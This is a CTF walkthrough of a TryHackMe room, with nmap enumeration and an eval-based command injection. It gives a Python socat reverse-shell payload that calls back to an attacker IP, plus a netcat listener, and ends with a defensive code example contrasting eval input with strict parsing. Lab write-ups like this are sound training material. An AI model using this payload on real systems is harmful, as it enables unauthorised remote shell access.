Hello guys, let's have a simple walkthrough of this medium machine from TryHackMe.
url: https://tryhackme.com/room/bsidesgtdevelpy
STEP 1: ENUMERATION
Using rustscan, we see that there are two open ports, so let's scan them for more details with nmap.
**nmap -sC -sV -oN nmap.txt -p22,10000 IP_address**

From the result above we see that port 10000 runs a Python (.py) script, so let's find a way to get our hands on that script.
I found a way we can get our hands on this exploit.py, and it is as follows:
nc -nv 10.10.126.22 10000

As you can see, if we enter 1, the script seems to run a ping request in the background; probably this one will be in /etc/crontab.
STEP 2: FOOTHOLDING
Let's check whether we can get command injection here.
Let's test with **;ls**

We ended up getting an error.
Reverse shell: __import__('os').system('socat TCP:10.8.15.35:1234 EXEC:sh')
Netcat: nc -nlvp 1234
I got a shell here; remember to stabilize it.
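Why **;ls** raised an error while a Python expression was accepted, as an added example that is not the room's script or part of the original walkthrough: it assumes the service reads its number the way Python 2's input() does (evaluating the line as Python), reproduced here with eval(), next to a hardened parser. The function names, the 1 to 100 range and the sample inputs are constructed for illustration.

```python
"""Added example: eval-style input handling vs. strict integer parsing."""


def read_count_vulnerable(raw: str) -> int:
    # Assumption: the service behaves like Python 2's input(), i.e.
    # eval(raw_input()). Any Python expression in the line is executed.
    return int(eval(raw))


def read_count_hardened(raw: str, lo: int = 1, hi: int = 100) -> int:
    # Treat the line as data: ASCII digits only, then a range check.
    # The bounds lo/hi are hypothetical values chosen for this example.
    text = raw.strip()
    if not (text.isascii() and text.isdigit()):
        raise ValueError("expected a whole number")
    value = int(text)
    if not lo <= value <= hi:
        raise ValueError("number out of range")
    return value


def outcome(reader, raw: str):
    # Run one reader on one input and report what happened.
    try:
        return ("ok", reader(raw))
    except Exception as exc:
        return ("rejected", type(exc).__name__)


# Constructed inputs: a number, the shell-style probe from the walkthrough,
# arithmetic, and a harmless expression that imports a module.
SAMPLES = ["1", ";ls", "2+3", "__import__('os').getpid()"]

if __name__ == "__main__":
    for raw in SAMPLES:
        print(f"{raw!r:32} vulnerable={outcome(read_count_vulnerable, raw)} "
              f"hardened={outcome(read_count_hardened, raw)}")
```

The evaluating reader fails on ;ls because it is shell syntax rather than a Python expression, yet it runs anything that is valid Python; the hardened reader rejects everything except a bounded whole number.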